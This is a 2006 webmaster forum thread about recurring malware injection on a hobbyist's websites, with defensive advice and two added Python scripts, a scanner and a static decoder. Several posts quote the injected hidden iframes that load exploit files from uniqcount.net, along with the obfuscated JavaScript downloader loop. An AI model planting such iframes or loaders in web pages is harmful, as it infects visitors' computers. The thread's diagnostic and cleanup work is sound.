#1  09-23-2006, 10:44 AM  MichelleStillCantType (WebProWorld Member, Ohio)
My Websites Keep Getting A Downloader Virus

Hope this is the right place to post this and someone can help. I had been running AVG alone until I got a couple of emails letting me know my sites had a virus. One was kind enough to let me know he was running Norton Internet Security. I bought it and sure enough, a downloader.

I can get rid of them for a couple of days by reuploading the index file and sometimes must also upload any php includes used on the index page. It keeps coming back though. My admin says it can't be my server.

Where do they come from, how do I stop them? The only help I get from Norton is how to remove a downloader from a computer. The problem is on my websites. Any help is so much appreciated. I'm lost.
#2  09-23-2006, 01:58 PM  Webnauts (WebProWorld MVP)
Thread moved

Thread moved here in the "Internet Security Discussion Forum".

I hope you will get help here.
#3  09-23-2006, 02:00 PM  Webnauts (WebProWorld MVP)
Re: My Websites Keep Getting A Downloader Virus

Quote:
Originally Posted by MichelleStillCantType
Where do they come from, how do I stop them? The only help I get from Norton is how to remove a downloader from a computer. The problem is on my websites. Any help is so much appreciated. I'm lost.
I would take the risk and check if you would tell me your site URL.
#4  09-23-2006, 02:41 PM  MichelleStillCantType (WebProWorld Member, Ohio)
Thank you!

Thank you so much. I believe I have them cleared again, so you should be safe, but I can't promise that. Like I said, they go away for a bit after I upload a new index file, but then they come back out of the blue. It is across my many sites.

www.enjoyportclinton.com
www.thelakeerieguide.com
www.ecampsite.com

There are more; please tell me if you would like the URLs.
#5  09-25-2006, 07:46 PM  imvain2 (WebProWorld Veteran)

Well, the virus is still there. I'm not sure which image is causing the problem; however, the virus is stored in a cursor or animated image of some kind.

Info from the anti-virus program that I use

It seems there is another virus that is run through a WMF (Windows Metafile, like the ones commonly used in Word).

More info
#6  09-25-2006, 10:17 PM  stevealmond (WebProWorld Member, Barbate, Spain)

I ran the risk as well, and yes the virus is still there along with the WMF virus.

Your server only serves up what you supply. If what you supply contains a virus, then your server will give it to the web. What you have uploaded to the server therefore must contain the viruses that we have found. So the answer to your question "where do they come from" is your own computer.

As you have recently bought Norton Internet Security, I would suggest that you do a full system scan on your own PC using Norton and clear up any problems that are found. You then need to delete all the files from your server. You can do this from the control panel if you have one, or by FTP. However, it may be best to ask your admin to delete your files for you and reformat your web space, as viruses do have a knack of returning once killed. Then you should have a clean web space, and a clean computer from which to upload your files.

If your own computer doesn't have any problems, then just clean up your web space and upload everything again. If this doesn't cure the problem then you really do have a very weird problem.

Steve
#7  09-25-2006, 10:51 PM  timmathews.com (WebProWorld Veteran, Fresh from Manhattan)

I got it too. I got 2 download viruses. Weird, I use AVG and it caught them. You say your AVG did not? Did you update it?
#8  09-25-2006, 11:13 PM  visio (WebProWorld Member, Venice, CA)

Actually, I think it is some link you have to http://uniqcount.net/. The virus seems to come from the following two files:
http://uniqcount.net/adv/171/xpl.wmf
http://uniqcount.net/adv/171/count.jar\BlackBox.class

Try to find where you link to these people and take off the link, then check again.
#9  09-26-2006, 12:13 AM  dean (WebProWorld Member, Philadelphia)

Looks like this is going around. Check out this thread at Castlecops:
http://www.castlecops.com/t160127-Downloader_Virus.html
#10  09-26-2006, 12:18 AM  imvain2 (WebProWorld Veteran)

It looks like the uniqcount is being pulled through iframes.
Code:
<iframe src='http://uniqcount.net/adv/new.php?adv=171' width=1 height=1></iframe>

<iframe src='http://uniqcount.net/adv/171/new.php' width=1 height=1></iframe>
What I did was use the w3 Validator (http://validator.w3.org/) and click the checkbox to view source. This way I can view the source without worrying about the virus. I'm sure there are many ways to accomplish that, but this way worked fine for me.
#11  09-26-2006, 12:27 AM  imvain2 (WebProWorld Veteran)

Just to see what the website actually looks like, I added uniqcount.net to my hosts file and pointed it at 127.0.0.1. That way any request that my computer makes to retrieve content from uniqcount.net is really looking locally for the files, therefore not downloading any virii.
#12  09-26-2006, 05:43 AM  billa (WebProWorld New Member, Pembrokeshire, UK)

Try Windows Defender, which (I think) is still currently a free download.
I had a problem that I could not get rid of for ages with different programs, and Defender (or, to be accurate, its older version) finally cracked it.
Amazingly enough, something good seems to have come out of the Microsoft stable...!
#13  09-26-2006, 05:54 AM  edhan (WebProWorld Veteran, Singapore)

Time Module Object Name Threat Action User Information
9/26/2006 16:34:35 PM IMON file http://uniqcount.net/adv/171/sploit.anr Win32/TrojanDownloader.Ani.gen trojan Connection terminated 2765586738\home
9/26/2006 16:34:17 PM IMON archive http://uniqcount.net/adv/171/count.jar Java/ClassLoader.AA trojan Connection terminated 2765586738\home

Well, it is definitely confirmed that http://uniqcount.net has a trojan. Remove it and you should be okay.
#14  09-26-2006, 11:40 AM  wige (WebProWorld Moderator, United States)

A software program you might want to try is Paros Proxy. This (free) program is a proxy server that you install on your computer, which allows you to view both the requests your web browser is making as well as the responses from the server, see the exact headers, and change or even block requests. I use it mostly to test design changes but for your issue it will help you narrow down why these files are being pushed to the clients. You will be able to use it to block the virus files from downloading as you work to locate the virus.

A few questions I have, because you mentioned that it goes away after you run the antivirus: Do you own the server, or is it at your location? Also, if you don't own the server, is it a dedicated or shared server? If you like, I could give it a cursory analysis and see if I see anything that looks vulnerable in the site/server itself.
#15  09-26-2006, 11:44 AM  EArmand (WebProWorld Member, DFW)
Scan, Delete, Change Passwords and Upload New Clean Files

I would deep scan my PC, delete all files from server, change all passwords including your FTP and Hosting Account Passwords and republish clean copy of your website files to your server. I've had something similar to this happen to me and I was able to fix this by deleting the infected files and changing the password to prevent new infected files from being published to my server by the hacker.
#16  09-26-2006, 11:53 AM  edhan (WebProWorld Veteran, Singapore)
Re: Scan, Delete, Change Passwords and Upload New Clean File

Quote:
Originally Posted by EArmand
I would deep scan my PC, delete all files from server, change all passwords including your FTP and Hosting Account Passwords and republish clean copy of your website files to your server. I've had something similar to this happen to me and I was able to fix this by deleting the infected files and changing the password to prevent new infected files from being published to my server by the hacker.
Yes. I do agree with EArmand. That way will completely eliminate any sign or existence of the worms, trojans or viruses on your server.
#17  09-26-2006, 01:14 PM  MarkGatESS (WebProWorld Member, Brewster, NY - USA)

I haven't run into the problem of this virus/trojan myself (so far), but I took precautions by using the link that dean had posted for CastleCops.com and I blocked the IP address range (81.95.144.0 - 81.95.147.255) that I found on the site in our company firewall. Hopefully, this will prevent anything being downloaded to our machines that's causing this problem.
#18  09-26-2006, 02:30 PM  Orion (WebProWorld MVP, Halton Hills, ON)

Ask your host provider if they have an anti-virus solution on their servers. Most shared hosting does not, but they should.
Have the host delete the site, then recreate it; that should get rid of it, provided that the virus hasn't spread to the server. If it has, you'll get it back again and your host provider will need to do a full scan and clean on their server(s).
#19  09-26-2006, 02:42 PM  TrafficProducer (WebProWorld MVP, United Kingdom)
Got a couple of emails letting me know about a Virus

Quote:
Got a couple of emails letting me know about a Virus
Be careful about emails about Viruses if from an unknown source.

These emails may be:

a) phishing
b) have viruses embedded or link to virus sites.
c) are trying to get you to buy software you may not need.
d) reporting spoof viruses
#20  09-26-2006, 02:58 PM  MichelleStillCantType (WebProWorld Member, Ohio)
Thank You!

I found it! I see the iframe with the http://uniqcount.net/adv/new.php?adv=171 url put into my index.php code. Thank you so much!

So basically this means I can solve the problem somewhat simply right?

Get my ftp username/pass changed and reupload new index files, correct?

Thank you again.
#21  09-26-2006, 03:13 PM  fbnewtz (WebProWorld New Member, Houston, TX)
New Password and check for new accounts

Not only would I change your password for your FTP account, but I would make sure that you do not have any other unknown accounts setup that have FTP access.

I don't know if you have a management panel with your website that allows you to control user/email accounts and potentially make changes to components of your server configuration.

Good luck, and make sure your password is at least 9 characters and has at least one upper case letter and a number or symbol.

Fred
#22  09-26-2006, 07:09 PM  wige (WebProWorld Moderator, United States)

Do you manage this server yourself or is it run by an outside company? If you own the server, you might want to invest in a vulnerability scanner that searches for and notifies you of possible weaknesses in the server. A free one is called Nessus from nessus.org (what can I say, I love free software). If your server is run by another company, they may knowingly and intentionally add the virus code to the pages they host. I have had it happen in the past with a web host forcing all sites to try to install spyware on visitor computers.
#23  09-26-2006, 08:59 PM  MichelleStillCantType (WebProWorld Member, Ohio)
Answers to questions

OK here is where I am so far in the event anyone else encounters this problem...

I downloaded an index file from my server and found two things in the code that I didn't put there.

iframe src='http://uniqcount.net/adv/new.php?adv=171' width=1 height=1
iframe src='http://uniqcount.net/adv/171/new.php' width=1 height=1

and the other is a JavaScript...
script language blah blah blah
e = '0x00' + '36';str1 = "%8D%D5%DE%C3%A9%C4%C5%CE%DD%D2%8A%97%C3%DE%C4%DE% D7%DE%DD%DE%C5%CE%8F%D1%DE%D5%D5%D2%DB%97%8B%8D%DE %D3%C7%D6%DA%D2%A9%C4%C7%D4%8A%97%D1%C5%C5%D9%8F%9 8%98%D4%DD%C3%D4%DB%C5%9B%D4%D8%DA%98%D5%DB%C3%84% 98%97%A9%C0%DE%D5%C5%D1%8A%86%A9%D1%D2%DE%D0%D1%C5 %8A%86%8B%8D%98%DE%D3%C7%D6%DA%D2%8B%8D%98%D5%DE%C 3%8B";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);

is the java hiding the wmf? I don't see a wmf anywhere.

I have asked my server admin to change my password and will upload all new files. Probably won't have a definitive answer as to whether this solved the problem for about a week. It took that long for the viruses to come back the first time I uploaded new index files.

The user/pass to my ftp being compromised is making sense. I have only one website with a different ftp login (same server) and it is the only one that has not gotten the virus. Knock on wood.

AVG - I was running AVG free and had it automatically updating and would manually install new versions.

Viruses on my PC - I ran AVG every night. When this problem started I got a trial of McAfee and ran that. Nothing on my PC. I then got a trial of Norton Internet Security and ran that. Nothing on my PC but it was the only one catching the viruses on my sites so I purchased it. I just ran a full scan again and still no viruses found on my computer.

My Server - I lease a dedicated server. I don't know anything about administrating a server, so I pay someone monthly to do that. He activates my domains, adds emails, everything. I have no access to cpanel or plesk and wouldn't know what to do with it if I did. I'm 100% server illiterate beyond ftp'ing. I just design sites.

When I told my server admin what was happening and asked if it was possible the server had a virus his response was...

"It isn't possible for your server to have a virus. It's possible for the files to contain a virus or for the system to be broken into. I do not see signs of it being hacked. I also installed some server virus scanner software and scanned all websites. Below is the information. It did not find any viruses. It's entirely possible that your different computers are infected and you are passing viruses around in your email correspondence."

He attached...
----------- SCAN SUMMARY -----------
Known viruses: 66700
Engine version: 0.88.4
Scanned directories: 2000
Scanned files: 25017
Infected files: 0
Data scanned: 1197.38 MB
Time: 1534.341 sec (25 m 34 s)

On a side note I may have just uploaded all new index files (which always gets rid of the virus for a few days) just b/4 he ran the scan. I honestly can't remember.

I hope I answered everything. I really appreciate all the help.
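As an added example (not code from this thread), here is a Python scanner for the two artefacts quoted in posts #10 and #23: an off-site 1x1 iframe and an inline script that rebuilds HTML with unescape()/String.fromCharCode() and document.write(). Running it over a downloaded copy of the web root flags the injected index files so they can be replaced; the web-root path and the trusted-host list are assumptions.

```python
"""Scan a web root for the injection seen in this thread: a hidden iframe
loading a third-party page, plus an inline decoder script that writes
HTML via unescape()/String.fromCharCode()/document.write().
Added example, not code from the thread.
"""
import re
import sys
from pathlib import Path
from urllib.parse import urlsplit

IFRAME = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""")
SUFFIXES = {".php", ".html", ".htm", ".inc", ".js", ".tpl"}  # assumed file types


def parse_attrs(tag):
    """Map attribute names to values for one tag (quoted or bare values)."""
    attrs = {}
    for m in ATTR.finditer(tag):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def is_hidden(attrs):
    """True for a frame sized 0/1 px or hidden through an inline style."""
    def tiny(v):
        return v is not None and v.strip().lower().rstrip("px") in {"0", "1"}
    style = attrs.get("style", "").replace(" ", "").lower()
    return (tiny(attrs.get("width")) or tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)


def find_indicators(text, trusted_hosts=()):
    """Return (kind, detail) findings for one file's content."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for tag in IFRAME.findall(text):
        attrs = parse_attrs(tag)
        src = attrs.get("src", "")
        host = urlsplit(src).hostname or ""
        # Off-site and invisible is the injection pattern; same-site or
        # visible frames are left alone.
        if host and host not in trusted and is_hidden(attrs):
            findings.append(("hidden_iframe", src))
    for body in SCRIPT.findall(text):
        # Heuristic: the decoder loop quoted in post #23 uses all three.
        if all(k in body for k in ("unescape(", "fromCharCode", "document.write")):
            findings.append(("obfuscated_script", body[:60].strip() + "..."))
    return findings


def scan_tree(root, trusted_hosts=()):
    """Walk a web root and return {path: findings} for files that hit."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            found = find_indicators(text, trusted_hosts)
            if found:
                hits[str(path)] = found
    return hits


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."  # assumed: local copy of the web root
    for path, found in scan_tree(root, trusted_hosts=("www.example.com",)).items():
        for kind, detail in found:
            print(f"{path}: {kind}: {detail}")
```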
#24  09-27-2006, 01:35 PM  wige (WebProWorld Moderator, United States)

Well, for the javascript, I love how it contains a function called function exploit(). This is from the uniqcount.net server. I looked through the javascript a bit. I am far from being an expert but it looks like these long strings contain code that is supposed to sneak past antivirus programs and force the browser to download files from the other server that contain the virus.

Virus scan would not find the problem, because the virus is not stored on your server. The virus code is being added by tricking the visitor's browser into downloading it from another server.

Your server has a few services running on it, POP3 and SMTP for e-mail (if you don't use this server for e-mail, close these ports) as well as the FTP and Apache servers. Using FTP does present a security risk because no attempt is made to encrypt your password. This puts your communication with the server at risk - anyone can fairly easily read your password. You may want to find out if you can switch to SFTP, which uses a secure certificate to encrypt your communications with the server. Most FTP clients now support this technology.

You seem to be using a log file analysis program called AWStats which is known to allow malicious users to execute commands on your server. It can also be used by remote users to gather information about your users, and may enable a remote user to change files on your server. This is something I would consider a high risk vulnerability. Upgrade to a newer version of the program or disable it as soon as possible.

Your installation of Apache allows diagnostic communications. This can be used to gather information about users in certain cross site scripting attacks. The recommended fix is as follows (requires mod-rewrite):
Code:
RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
The above code should be added to the configuration files for each of your virtual hosts. Also your current configuration makes it possible for users to guess the user names of user accounts on the server. You may want to avoid this by disabling user directories in the Apache configuration file.

Uniqcount.net, where the virus code itself is coming from, does not have much information. You might want to try to contact the owner of that site. Unfortunately, the site seems to be located in Russia, and may be owned by the attacker. I could not find any reliable registration information for the domain name or the IP address except that it is in the Russian Federation. Possibly affiliated with a spam or spyware company.

Quote:
Originally Posted by Your server admin
"It isn't possible for your server to have a virus. It's possible for the files to contain a virus or for the system to be broken into. I do not see signs of it being hacked. I also installed some server virus scanner software and scanned all websites. Below is the information. It did not find any viruses. It's entirely possible that your different computers are infected and you are passing viruses around in your email correspondence."
Which tells me your server admin has never browsed any of your web sites when you advised him/her of the issue. As far as the bit about it not being possible for your server to have a virus, WHAT?!?!?! He/she also says that the websites were scanned, what about the filesystem? There may be a file in the system that notifies the attacker when you change your code, which is how they know to go back and re-add the exploit. Your admin should check the running processes and cron tasks for unauthorized processes.
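To read what the injected script writes without loading it in a browser, here is an added Python decoder (not the thread's code) for the scheme visible in the script Michelle posted: each %XX byte is XORed with e ('0x00' + '36', which JavaScript converts to 54 in the XOR) and then 127 is subtracted. The encode() helper and SAMPLE exist only to construct a test input; the forum's line-wrap spaces inside the real string would need removing first.

```python
"""Static decode of the obfuscated script quoted in post #23, so the HTML
it would document.write() can be read without executing it.
Added example, not the thread's code.
"""
import re

E = int("0x0036", 16)  # '0x00' + '36' is '0x0036'; JavaScript's ^ turns it into 54
OFFSET = 127


def decode(str1, e=E):
    """Rebuild the string the script hands to document.write()."""
    out = []
    for hx in re.findall(r"%([0-9A-Fa-f]{2})", str1):  # one %XX per slice(i, i+3)
        out.append(chr((int(hx, 16) ^ e) - OFFSET))
    return "".join(out)


def encode(text, e=E):
    """Inverse of decode(); used here only to construct a sample input."""
    if any(ord(c) > 128 for c in text):
        raise ValueError("scheme only covers ASCII")
    return "".join("%%%02X" % ((ord(c) + OFFSET) ^ e) for c in text)


def decoded_tags(str1):
    """Tag names the decoded HTML would create: the reviewer's question."""
    return re.findall(r"<\s*([a-zA-Z]+)", decode(str1))


# Constructed sample; placeholder content, not the posted payload.
SAMPLE = encode('<div style="display:none">constructed sample</div>')

if __name__ == "__main__":
    print(decode(SAMPLE))
    print(decoded_tags(SAMPLE))
```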